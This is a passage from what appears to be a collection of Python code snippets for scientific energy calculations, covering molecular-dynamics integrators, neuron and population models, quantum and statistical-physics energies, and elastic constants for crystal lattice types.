initialization.\n #\n self.addGlobalVariable(\"kT\", kT) # thermal energy\n self.addGlobalVariable(\"b\", numpy.exp(-gamma * timestep)) # velocity mixing parameter\n self.addPerDofVariable(\"sigma\", 0)\n self.addGlobalVariable(\"ke\", 0) # kinetic energy\n self.addPerDofVariable(\"vold\", 0) # old velocities\n self.addPerDofVariable(\"xold\", 0) # old positions\n self.addGlobalVariable(\"Eold\", 0) # old energy\n self.addGlobalVariable(\"Enew\", 0) # new energy\n self.addGlobalVariable(\"accept\", 0) # accept or reject\n self.addGlobalVariable(\"naccept\", 0) # number accepted\n self.addGlobalVariable(\"ntrials\", 0) # number of Metropolization trials\n self.addPerDofVariable(\"x1\", 0) # position before application of constraints\n\n #\n # Pre-computation.\n # This only needs to be done once, but it needs to be done for each degree of freedom.\n # Could move this to initialization?\n #\n self.addComputePerDof(\"sigma\", \"sqrt(kT/m)\")\n\n #\n # Allow context updating here.\n #\n self.addUpdateContextState()\n\n #\n # Constrain positions.\n #\n self.addConstrainPositions()\n\n #\n # Velocity perturbation.\n #\n self.addComputePerDof(\"v\", \"sqrt(b)*v + sqrt(1-b)*sigma*gaussian\")\n self.addConstrainVelocities()\n\n #\n # Metropolized symplectic step.\n #\n self.addComputeSum(\"ke\", \"0.5*m*v*v\")\n self.addComputeGlobal(\"Eold\", \"ke + energy\")\n self.addComputePerDof(\"xold\", \"x\")\n self.addComputePerDof(\"vold\", \"v\")\n self.addComputePerDof(\"v\", \"v + 0.5*dt*f/m\")\n self.addComputePerDof(\"x\", \"x + v*dt\")\n self.addComputePerDof(\"x1\", \"x\")\n self.addConstrainPositions()\n self.addComputePerDof(\"v\", \"v + 0.5*dt*f/m + (x-x1)/dt\")\n self.addConstrainVelocities()\n self.addComputeSum(\"ke\", \"0.5*m*v*v\")\n self.addComputeGlobal(\"Enew\", \"ke + energy\")\n self.addComputeGlobal(\"accept\", \"step(exp(-(Enew-Eold)/kT) - uniform)\")\n self.addComputePerDof(\"x\", \"x*accept + xold*(1-accept)\")\n self.addComputePerDof(\"v\", \"v*accept - vold*(1-accept)\")\n\n #\n # Velocity randomization\n #\n self.addComputePerDof(\"v\", \"sqrt(b)*v + sqrt(1-b)*sigma*gaussian\")\n self.addConstrainVelocities()\n\n #\n # Accumulate statistics.\n #\n self.addComputeGlobal(\"naccept\", \"naccept + accept\")\n self.addComputeGlobal(\"ntrials\", \"ntrials + 1\")", "def _calc_Em(self):\n return (self.parameters.E0 +\n self.x * sqrt2 * self.parameters.sigma * self.mt)", "def calc_ked_WFI(self):\n\n #Initialize kinetic energy density\n self.ked_WFI = np.zeros( (self.grid.Nelem, 1))\n\n #Figure out the number of occupied orbitals\n if self.m == 0:\n if self.pol == 1:\n Nocc = np.floor(self.N/2)\n nu = self.N / 2 - Nocc\n else:\n Nocc = np.floor(self.N)\n nu = self.N - Nocc\n\n else:\n #m>0 orbitals hold twice as many electrons due to +-m symmetry\n if self.pol == 1:\n Nocc = np.floor(self.N / 4)\n nu = self.N / 4 - Nocc\n else:\n Nocc = np.floor(self.N/2)\n nu = self.N / 2 - Nocc\n\n #Construct density\n for i in range(int(Nocc)):\n # print(\"phi from pssolver\", self.phi)\n # print(\"phi subset\", self.phi[:,i])\n # print(\"integrate returns\", self.grid.integrate( self.phi[:,i]**2 )**0.5)\n\n #Normalized orbital\n phi_norm = self.phi[:,i] / self.grid.integrate( self.phi[:,i]**2 )**0.5\n phi_norm = phi_norm[:, None]\n self.ked_WFI += (phi_norm * (self.H0 @ phi_norm)) / self.grid.w[:, None]\n\n #If we are doing fractional robitals and are non-integer\n if self.FRACTIONAL is True and nu != 0:\n #Normalized orbital\n phi_norm = self.phi[:,i] / self.grid.integrate( self.phi[:, Nocc+1]**2)**0.5\n phi_norm = phi_norm[:, None]\n self.ked_WFI += nu * ( phi_norm * (self.H0 @ phi_norm) ) / self.grid.w[:, None]\n\n #Scale densities appropriately\n if self.m == 0:\n if self.pol == 1: #Unpolarized electrons\n self.ked_WFI = 2 * self.ked_WFI\n\n else: # m>0 orbitals hold twice as many electrons due to +-m symmetry\n if self.pol == 1:\n self.ked_WFI = 4 * self.ked_WFI\n else:\n self.ked_WFI = 2 * self.ked_WFI", "def DyEvo(x, t, T0, r1, r2, K_co, K_ch, alpha, n):\n y=np.zeros([np.size(x)])\n D=np.zeros([2]) \n #define fitnss\n D[0]=dmax*x[0]**n/(K_co**n+x[0]**n) #cooperator\n D[1]=dmax*x[0]**n/(K_ch**n+x[0]**n) #cheater \n #degradation\n deg=fmax*x[1]/(x[1]+Kd) \n #ODE of eco-evo dynamics\n y[0]=alpha*T0-deg*x[0]-alpha*x[0] #dt/dt\n y[1]=x[1]*(r1*(1-x[1]-x[2])-D[0]-alpha)#d Co/dt\n y[2]=x[2]*(r2*(1-x[1]-x[2])-D[1]-alpha) #d Ch/dt\n \n return y", "def spikingModel(wEE, wEI, wIE, wII, stim_e, stim_i,\n time=1000, dt=0.1, Vth=1.0, Vre=0.0,\n tau_e=15.0, tau_i=10.0, ref_e=5.0, ref_i=5.0, \n syntau2_e=3.0, syntau2_i=2.0, syntau1=1.0):\n\n T = np.arange(0,time,dt)\n nE = wEE.shape[0]\n nI = wII.shape[0]\n\n Ve = np.zeros((nE,len(T)))\n Vi = np.zeros((nI,len(T)))\n # Set initial conditions\n Ve = np.random.uniform(0,1,size=(nE,))\n Vi = np.random.uniform(0,1,size=(nI,))\n # Instantiate synaptic currents empty matrix\n Ie = np.zeros((nE,len(T)))\n Ii = np.zeros((nI,len(T)))\n # Instantiate spiking matrix\n spkE = np.zeros((nE,time))\n spkI = np.zeros((nI,time))\n # Instantiate synaptic input matrix (temporally downsampled)\n synE = np.zeros((nE,time))\n synI = np.zeros((nI,time))\n\n bin_spkE = np.zeros((nE,))\n bin_spkI = np.zeros((nI,))\n # Synaptic rise gating variable\n xrse_ee = np.zeros((nE,))\n xdec_ee = np.zeros((nE,))\n xrse_ei= np.zeros((nI,))\n xdec_ei = np.zeros((nI,))\n xrse_ie = np.zeros((nE,))\n xdec_ie = np.zeros((nE,))\n xrse_ii= np.zeros((nI,))\n xdec_ii = np.zeros((nI,))\n\n\n # Set random biases from a uniform distribution\n # Excitatory neurons\n mu_e = np.random.uniform(1.1,1.2,size=(nE,))\n #mu_e = np.random.uniform(1.05,1.15,size=(nE,)) # Imbalanced state\n # Inhibitory neurons\n mu_i = np.random.uniform(1.0,1.05,size=(nI,))\n\n maxrate = 500 # max rate is 100hz\n maxtimes = int(np.round(maxrate*time/1000))\n timesE = np.zeros((nE,maxrate))\n timesI = np.zeros((nI,maxrate))\n ne_s = np.zeros((nE,),dtype=int)\n ni_s = np.zeros((nI,),dtype=int)\n\n refractory_e = np.zeros((nE,))\n refractory_i = np.zeros((nI,))\n for t in range(len(T)-1):\n ## Using RK2 method\n\n ## K1s\n Ve = Ve + dt*((mu_e + stim_e - Ve)/tau_e + Ie[:,t])\n Vi = Vi + dt*((mu_i + stim_i - Vi)/tau_i + Ii[:,t])\n\n # Synaptic gating\n # Excitatory synapses\n xrse_ee = xrse_ee - dt*xrse_ee/syntau1 + np.matmul(bin_spkE,wEE)\n xdec_ee = xdec_ee - dt*xdec_ee/syntau2_e + np.matmul(bin_spkE,wEE)\n xrse_ei = xrse_ei - dt*xrse_ei/syntau1 + np.matmul(bin_spkE,wEI)\n xdec_ei = xdec_ei - dt*xdec_ei/syntau2_e + np.matmul(bin_spkE,wEI)\n # Inhibitory dt*synapses\n xrse_ie = xrse_ie - dt*xrse_ie/syntau1 + np.matmul(bin_spkI,wIE)\n xdec_ie = xdec_ie - dt*xdec_ie/syntau2_i + np.matmul(bin_spkI,wIE)\n xrse_ii = xrse_ii - dt*xrse_ii/syntau1 + np.matmul(bin_spkI,wII)\n xdec_ii = xdec_ii - dt*xdec_ii/syntau2_i + np.matmul(bin_spkI,wII)\n\n # Calculate synaptic outputs given rise and decay times\n Ie[:,t+1] = (xdec_ee - xrse_ee)/(syntau2_e - syntau1) + (xdec_ie - xrse_ie)/(syntau2_i - syntau1)\n Ii[:,t+1] = (xdec_ii - xrse_ii)/(syntau2_i - syntau1) + (xdec_ei - xrse_ei)/(syntau2_e - syntau1)\n\n ## Spiking\n # Find which neurons exceed threshold (and are not in a refractory period)\n bin_spkE = np.multiply(Ve>Vth, refractory_e==0.0)\n bin_spkI = np.multiply(Vi>Vth, refractory_i==0.0)\n\n # Save spike time (and downsample to 1ms)\n tms = int(np.floor(T[t]))\n spkE[bin_spkE,tms] = 1 # spikes are okay - refractory period is 5ms, anyway\n spkI[bin_spkI,tms] = 1\n synE[:,tms] = synE[:,tms] + Ie[:,t]\n synI[:,tms] = synI[:,tms] + Ii[:,t]\n\n # Reset voltages\n Ve[bin_spkE] = Vre\n Vi[bin_spkI] = Vre\n\n # spike times\n timesE[bin_spkE,ne_s[bin_spkE]] = T[t+1]\n timesI[bin_spkI,ni_s[bin_spkI]] = T[t+1]\n ne_s[bin_spkE] = ne_s[bin_spkE] + 1\n ni_s[bin_spkI] = ni_s[bin_spkI] + 1\n\n\n # Set refractory period\n # Add a refractory time step to neurons who just spiked, and to those are still in a refractory period\n refractory_e = refractory_e + (bin_spkE * dt) + (refractory_e!=0) * dt \n refractory_i = refractory_i + (bin_spkI * dt) + (refractory_i!=0) * dt\n # Once refractory period is complete, allow to spike\n can_spike_again_e = np.round(refractory_e,1) == ref_e\n can_spike_again_i = np.round(refractory_i,1) == ref_i\n\n refractory_e[can_spike_again_e] = 0.0\n refractory_i[can_spike_again_i] = 0.0\n\n # Set neurons who are in their refractory to the baseline membrane potential\n in_refractory_e = refractory_e != 0.0\n in_refractory_i = refractory_i != 0.0\n\n Ve[in_refractory_e] = Vre\n Vi[in_refractory_i] = Vre\n \n return spkE, spkI, synE, synI, timesE, timesI, ne_s, ni_s", "def band_energy(k,t=1.0,e0=0.2,a=1.0):\n return e0-t*np.exp(1j*k*a)-t*np.exp(-1j*k*a)", "def energy(data):\n\n return np.real(np.mean(np.abs(data)**2, axis=1))", "def conductivity(self, T):\n m = self.mass\n mu = self.viscosity(T)\n K = (15/4) * kB * mu / m\n return K", "def measure_kinetic_energy(self, t_measure=None):\n assert self.data is not None\n time = self.get_time()\n N = self.get_N()\n m0 = self.sim_chain.m0\n #print 'm0', m0\n \n if t_measure is not None:\n # find index for time closest to t_measure\n idx = self._find_index_for_time(t_measure)\n \n # calculate kinetic energy\n velocities = self.data[idx,N:2*N]\n masses = self.sim_chain.m\n kinetic_energy = 0.5*np.sum( np.multiply(masses/m0, velocities**2.0) )\n return kinetic_energy\n else:\n kinetic_energies = np.zeros(len(time))\n ctr = 0\n for tau in time:\n kinetic_energies[ctr] = self.measure_kinetic_energy(tau)\n ctr += 1\n return kinetic_energies", "def get_energy(self, circuit, sampler):\n val = 0.0\n for meas in self.hamiltonian:\n c = circuit.copy()\n for op in meas.ops:\n if op.op == \"X\":\n c.h[op.n]\n elif op.op == \"Y\":\n c.rx(-np.pi / 2)[op.n]\n measured = sampler(c, meas.n_iter())\n for bits, prob in measured.items():\n if sum(bits) % 2:\n val -= prob * meas.coeff\n else:\n val += prob * meas.coeff\n return val.real", "def energy(self, visible):\n bias_term = tf.matmul(visible, self._bias_visible)\n linear_transform = tf.matmul(visible, self._weights) + tf.squeeze(self._bias_hidden)\n hidden_term = tf.reduce_sum(tf.math.log(1 + tf.exp(linear_transform)), axis=1)\n return tf.reduce_mean(-hidden_term - bias_term)", "def energy(p,m):\n return math.sqrt(p*p + m*m)", "def energy_yield(self):\n return self['kwh_per_kw']", "def make_energy(self):\n @nb.njit\n def energy_func(m):\n heff = self.field(m)\n return -energy.zeeman(m, self.Ms, heff) \\\n + energy.shape_anisotropy(m, self.Ms, self.Nd[0], self.Nd[1], self.Nd[2]) \\\n + energy.uniaxial_anisotropy(m, self.u, self.Ku1, self.Ku2) \\\n + energy.cubic_anisotropy(m, self.c1, self.c2, self.c3,\n self.Kc1, self.Kc2, self.Kc3)\n self.energy = energy_func", "def Fermi(En,T):\n ev = 1.60218e-19\n kb = 1.380e-23\n return 1/(1+np.exp(En/(kb*T/ev)))", "def energy(self, r):\n sigma = self.params['sigma']\n epsilon = self.params['epsilon']\n s = sigma / r\n s6 = s**6; s12 = s6 * s6\n pot = 4.0 * epsilon * (s12 - s6)\n return pot", "def set_ec(self, etacalc):\n if not self.__thermodyn:\n C = np.zeros((6,6))\n \n LC = self.__structures.items()[0][1].LC\n if self.__mthd == 'Energy':\n if type(etacalc)==list:\n A2=[]\n for i in range(len(etacalc)):\n A2.append(self.__A2[i][etacalc[i]])\n else:\n if not etacalc in self.__A2[0].keys(): raise ValueError('Please coose one of %s'%(self.__A2[0].keys()))\n A2 = [a2[etacalc] for a2 in self.__A2]\n \n \n #%%%--- Cubic structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'CI' or \\\n LC == 'CII'):\n C[0,0] =-2.*(A2[0]-3.*A2[1])/3.\n C[1,1] = C[0,0]\n C[2,2] = C[0,0]\n C[3,3] = A2[2]/6.\n C[4,4] = C[3,3]\n C[5,5] = C[3,3]\n C[0,1] = (2.*A2[0]-3.*A2[1])/3.\n C[0,2] = C[0,1]\n C[1,2] = C[0,1]\n #--------------------------------------------------------------------------------------------------------------------------------\n \n #%%%--- Hexagonal structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'HI' or \\\n LC == 'HII'):\n C[0,0] = 2.*A2[3]\n C[0,1] = 2./3.*A2[0] + 4./3.*A2[1] - 2.*A2[2] - 2.*A2[3]\n C[0,2] = 1./6.*A2[0] - 2./3.*A2[1] + 0.5*A2[2]\n C[1,1] = C[0,0]\n C[1,2] = C[0,2]\n C[2,2] = 2.*A2[2]\n C[3,3] =-0.5*A2[2] + 0.5*A2[4]\n C[4,4] = C[3,3]\n C[5,5] = .5*(C[0,0] - C[0,1])\n #--------------------------------------------------------------------------------------------------------------------------------\n \n #%%%--- Rhombohedral I structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'RI'):\n C[0,0] = 2.*A2[3]\n C[0,1] = A2[1]- 2.*A2[3]\n C[0,2] = .5*( A2[0] - A2[1] - A2[2])\n C[0,3] = .5*(-A2[3] - A2[4] + A2[5])\n C[1,1] = C[0,0]\n C[1,2] = C[0,2]\n C[1,3] =-C[0,3]\n C[2,2] = 2.*A2[2]\n C[3,3] = .5*A2[4]\n C[4,4] = C[3,3]\n C[4,5] = C[0,3]\n C[5,5] = .5*(C[0,0] - C[0,1])\n #--------------------------------------------------------------------------------------------------------------------------------\n \n #%%%--- Rhombohedral II structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'RII'):\n C[0,0] = 2.*A2[3]\n C[0,1] = A2[1]- 2.*A2[3]\n C[0,2] = .5*( A2[0] - A2[1] - A2[2])\n C[0,3] = .5*(-A2[3] - A2[4] + A2[5])\n C[0,4] = .5*(-A2[3] - A2[4] + A2[6])\n C[1,1] = C[0,0]\n C[1,2] = C[0,2]\n C[1,3] =-C[0,3]\n C[1,4] =-C[0,4] \n C[2,2] = 2.*A2[2]\n C[3,3] = .5*A2[4]\n C[3,5] =-C[0,4]\n C[4,4] = C[3,3]\n C[4,5] = C[0,3]\n C[5,5] = .5*(C[0,0] - C[0,1])\n #--------------------------------------------------------------------------------------------------------------------------------\n \n #%%%--- Tetragonal I structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'TI'):\n C[0,0] = (A2[0]+2.*A2[1])/3.+.5*A2[2]-A2[3]\n C[0,1] = (A2[0]+2.*A2[1])/3.-.5*A2[2]-A2[3]\n C[0,2] = A2[0]/6.-2.*A2[1]/3.+.5*A2[3]\n C[1,1] = C[0,0]\n C[1,2] = C[0,2]\n C[2,2] = 2.*A2[3]\n C[3,3] = .5*A2[4]\n C[4,4] = C[3,3]\n C[5,5] = .5*A2[5]\n #--------------------------------------------------------------------------------------------------------------------------------\n \n #%%%--- Tetragonal II structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'TII'):\n C[0,0] = (A2[0]+2.*A2[1])/3.+.5*A2[2]-A2[4]\n C[1,1] = C[0,0]\n C[0,1] = (A2[0]+2.*A2[1])/3.-.5*A2[2]-A2[4]\n C[0,2] = A2[0]/6.-(2./3.)*A2[1]+.5*A2[4]\n C[0,5] = (-A2[2]+A2[3]-A2[6])/4.\n C[1,2] = C[0,2]\n C[1,5] =-C[0,5]\n C[2,2] = 2.*A2[4]\n C[3,3] = .5*A2[5]\n C[4,4] = C[3,3]\n C[5,5] = .5*A2[6]\n #--------------------------------------------------------------------------------------------------------------------------------\n \n #%%%--- Orthorhombic structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'O'):\n C[0,0] = 2.*A2[0]/3.+4.*A2[1]/3.+A2[3]-2.*A2[4]-2.*A2[5]\n C[0,1] = 1.*A2[0]/3.+2.*A2[1]/3.-.5*A2[3]-A2[5]\n C[0,2] = 1.*A2[0]/3.-2.*A2[1]/3.+4.*A2[2]/3.-.5*A2[3]-A2[4]\n C[1,1] = 2.*A2[4]\n C[1,2] =-2.*A2[1]/3.-4.*A2[2]/3.+.5*A2[3]+A2[4]+A2[5]\n C[2,2] = 2.*A2[5]\n C[3,3] = .5*A2[6]\n C[4,4] = .5*A2[7]\n C[5,5] = .5*A2[8]\n #--------------------------------------------------------------------------------------------------------------------------------\n \n #%%%--- Monoclinic structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'M'):\n C[0,0] = 2.*A2[0]/3.+8.*(A2[1]+A2[2])/3.-2.*(A2[5]+A2[8]+A2[9])\n C[0,1] = A2[0]/3.+4.*(A2[1]+A2[2])/3.-2.*A2[5]-A2[9]\n C[0,2] =(A2[0]-4.*A2[2])/3.+A2[5]-A2[8]\n C[0,5] =-1.*A2[0]/6.-2.*(A2[1]+A2[2])/3.+.5*(A2[5]+A2[7]+A2[8]+A2[9]-A2[12])\n C[1,1] = 2.*A2[8]\n C[1,2] =-4.*(2.*A2[1]+A2[2])/3.+2.*A2[5]+A2[8]+A2[9]+A2[12]\n C[1,5] =-1.*A2[0]/6.-2.*(A2[1]+A2[2])/3.-.5*A2[3]+A2[5]+.5*(A2[7]+A2[8]+A2[9])\n C[2,2] = 2.*A2[9]\n C[2,5] =-1.*A2[0]/6.+2.*A2[1]/3.-.5*(A2[3]+A2[4]-A2[7]-A2[8]-A2[9]-A2[12])\n C[3,3] = .5*A2[10]\n C[3,4] = .25*(A2[6]-A2[10]-A2[11])\n C[4,4] = .5*A2[11]\n C[5,5] = .5*A2[12]\n #--------------------------------------------------------------------------------------------------------------------------------\n \n #%%%--- Triclinic structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'N'):\n C[0,0] = 2.*A2[0]\n C[0,1] = 1.*(-A2[0]-A2[1]+A2[6])\n C[0,2] = 1.*(-A2[0]-A2[2]+A2[7])\n C[0,3] = .5*(-A2[0]-A2[3]+A2[8]) \n C[0,4] = .5*(-A2[0]+A2[9]-A2[4])\n C[0,5] = .5*(-A2[0]+A2[10]-A2[5])\n C[1,1] = 2.*A2[1]\n C[1,2] = 1.*(A2[11]-A2[1]-A2[2])\n C[1,3] = .5*(A2[12]-A2[1]-A2[3])\n C[1,4] = .5*(A2[13]-A2[1]-A2[4])\n C[1,5] = .5*(A2[14]-A2[1]-A2[5])\n C[2,2] = 2.*A2[2] \n C[2,3] = .5*(A2[15]-A2[2]-A2[3])\n C[2,4] = .5*(A2[16]-A2[2]-A2[4])\n C[2,5] = .5*(A2[17]-A2[2]-A2[5])\n C[3,3] = .5*A2[3]\n C[3,4] = .25*(A2[18]-A2[3]-A2[4])\n C[3,5] = .25*(A2[19]-A2[3]-A2[5])\n C[4,4] = .5*A2[4]\n C[4,5] = .25*(A2[20]-A2[4]-A2[5])\n C[5,5] = .5*A2[5]\n #--------------------------------------------------------------------------------------------------------------------------------\n \n elif self.__mthd == 'Stress':\n \n if (LC == 'CI' or \\\n LC == 'CII'):\n Matrix = np.mat([[1.0, 5.0, 0.0],\n [2.0, 4.0, 0.0],\n [3.0, 3.0, 0.0],\n [0.0, 0.0, 4.0],\n [0.0, 0.0, 5.0],\n [0.0, 0.0, 6.0]])\n \n if (LC == 'HI' or \\\n LC == 'HII'):\n Matrix = np.mat([[ 1, 2, 3, 0, 0],\n [ 2, 1, 3, 0, 0],\n [ 0, 0, 3, 3, 0],\n [ 0, 0, 0, 0, 4],\n [ 0, 0, 0, 0, 5],\n [ 3,-3, 0, 0, 0],\n [ 3,-5,-1, 0, 0],\n [-5, 3,-1, 0, 0],\n [ 0, 0,-2,-1, 0],\n [ 0, 0, 0, 0, 6],\n [ 0, 0, 0, 0, 2],\n [-2, 2, 0, 0, 0]])\n \n if (LC == 'RI'):\n Matrix = np.mat([[ 1, 2, 3, 4, 0, 0],\n [ 2, 1, 3,-4, 0, 0],\n [ 0, 0, 3, 0, 3, 0],\n [ 0, 0, 0,-1, 0, 4],\n [ 0, 0, 0, 6, 0, 5],\n [ 3,-3, 0, 5, 0, 0],\n [ 3,-5,-1, 6, 0, 0],\n [-5, 3,-1,-6, 0, 0],\n [ 0, 0,-2, 0,-1, 0],\n [ 0, 0, 0, 8, 0, 6],\n [ 0, 0, 0,-4, 0, 2],\n [-2, 2, 0, 2, 0, 0]])\n \n if (LC == 'RII'):\n Matrix = np.mat([[ 1, 2, 3, 4, 5, 0, 0],\n [ 2, 1, 3,-4,-5, 0, 0],\n [ 0, 0, 3, 0, 0, 3, 0],\n [ 0, 0, 0,-1,-6, 0, 4],\n [ 0, 0, 0, 6,-1, 0, 5],\n [ 3,-3, 0, 5,-4, 0, 0],\n [ 3,-5,-1, 6, 2, 0, 0],\n [-5, 3,-1,-6,-2, 0, 0],\n [ 0, 0,-2, 0, 0,-1, 0],\n [ 0, 0, 0, 8, 4, 0, 6],\n [ 0, 0, 0,-4, 8, 0, 2],\n [-2, 2, 0, 2,-6, 0, 0]])\n \n if (LC == 'TI'):\n Matrix = np.mat([[ 1, 2, 3, 0, 0, 0],\n [ 2, 1, 3, 0, 0, 0],\n [ 0, 0, 3, 3, 0, 0],\n [ 0, 0, 0, 0, 4, 0],\n [ 0, 0, 0, 0, 5, 0],\n [ 0, 0, 0, 0, 0, 6],\n [ 3,-5,-1, 0, 0, 0],\n [-5, 3,-1, 0, 0, 0],\n [ 0, 0,-2,-1, 0, 0],\n [ 0, 0, 0, 0, 6, 0],\n [ 0, 0, 0, 0, 2, 0],\n [ 0, 0, 0, 0, 0,-4]])\n \n if (LC == 'TII'):\n Matrix = np.mat([[ 1, 2, 3, 6, 0, 0, 0],\n [ 2, 1, 3,-6, 0, 0, 0],\n [ 0, 0, 3, 0, 3, 0, 0],\n [ 0, 0, 0, 0, 0, 4, 0],\n [ 0, 0, 0, 0, 0, 5, 0],\n [ 0, 0, 0,-1, 0, 0, 6],\n [ 3,-5,-1,-4, 0, 0, 0],\n [-5, 3,-1, 4, 0, 0, 0],\n [ 0, 0,-2, 0,-1, 0, 0],\n [ 0, 0, 0, 0, 0, 6, 0],\n [ 0, 0, 0, 0, 0, 2, 0],\n [ 0, 0, 0, 8, 0, 0,-4]])\n \n if (LC == 'O'):\n Matrix = np.mat([[1, 2, 3, 0, 0, 0, 0, 0, 0],\n [0, 1, 0, 2, 3, 0, 0, 0, 0],\n [0, 0, 1, 0, 2, 3, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 4, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 5, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 6],\n [3,-5,-1, 0, 0, 0, 0, 0, 0],\n [0, 3, 0,-5,-1, 0, 0, 0, 0],\n [0, 0, 3, 0,-5,-1, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 6, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 2, 0],\n [0, 0, 0, 0, 0, 0, 0, 0,-4],\n [5, 4, 6, 0, 0, 0, 0, 0, 0],\n [0, 5, 0, 4, 6, 0, 0, 0, 0],\n [0, 0, 5, 0, 4, 6, 0, 0, 0],\n [0, 0, 0, 0, 0, 0,-2, 0, 0],\n [0, 0, 0, 0, 0, 0, 0,-1, 0],\n [0, 0, 0, 0, 0, 0, 0, 0,-3]])\n \n if (LC == 'M'):\n Matrix = np.mat([[ 1, 2, 3, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 1, 0, 0, 2, 3, 6, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 1, 0, 0, 2, 0, 3, 6, 0, 0, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 5, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 5, 0],\n [ 0, 0, 0, 1, 0, 0, 2, 0, 3, 0, 0, 0, 6],\n [-2, 1, 4,-5, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0,-2, 0, 0, 1, 4,-5, 0, 0, 0, 0, 0, 0],\n [ 0, 0,-2, 0, 0, 1, 0, 4,-5, 0, 0, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0,-3, 6, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-3, 6, 0],\n [ 0, 0, 0,-2, 0, 0, 1, 0, 4, 0, 0,-5, 0],\n [ 3,-5,-1,-4, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 3, 0, 0,-5,-1,-4, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 3, 0, 0,-5, 0,-1,-4, 0, 0, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 2, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 2, 0],\n [ 0, 0, 0, 3, 0, 0,-5, 0,-1, 0, 0,-4, 0],\n [-4,-6, 5, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0,-4, 0, 0,-6, 5, 2, 0, 0, 0, 0, 0, 0],\n [ 0, 0,-4, 0, 0,-6, 0, 5, 2, 0, 0, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 1,-3, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1,-3, 0],\n [ 0, 0, 0,-4, 0, 0,-6, 0, 5, 0, 0, 2, 0],\n [ 5, 4, 6,-3, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 5, 0, 0, 4, 6,-3, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 5, 0, 0, 4, 0, 6,-3, 0, 0, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0,-2,-1, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2,-1, 0],\n [ 0, 0, 0, 5, 0, 0, 4, 0, 6, 0, 0,-3, 0]])\n \n if (LC == 'N'):\n Matrix = np.mat([[ 1, 2, 3, 4, 5, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 1, 0, 0, 0, 0, 2, 3, 4, 5, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 1, 0, 0, 0, 0, 2, 0, 0, 0, 3, 4, 5, 6, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 0, 1, 0, 0, 0, 0, 2, 0, 0, 0, 3, 0, 0, 4, 5, 6, 0, 0, 0],\n [ 0, 0, 0, 0, 1, 0, 0, 0, 0, 2, 0, 0, 0, 3, 0, 0, 4, 0, 5, 6, 0],\n [ 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 2, 0, 0, 0, 3, 0, 0, 4, 0, 5, 6],\n [-2, 1, 4,-3, 6,-5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0,-2, 0, 0, 0, 0, 1, 4,-3, 6,-5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 0,-2, 0, 0, 0, 0, 1, 0, 0, 0, 4,-3, 6,-5, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 0,-2, 0, 0, 0, 0, 1, 0, 0, 0, 4, 0, 0,-3, 6,-5, 0, 0, 0],\n [ 0, 0, 0, 0,-2, 0, 0, 0, 0, 1, 0, 0, 0, 4, 0, 0,-3, 0, 6,-5, 0],\n [ 0, 0, 0, 0, 0,-2, 0, 0, 0, 0, 1, 0, 0, 0, 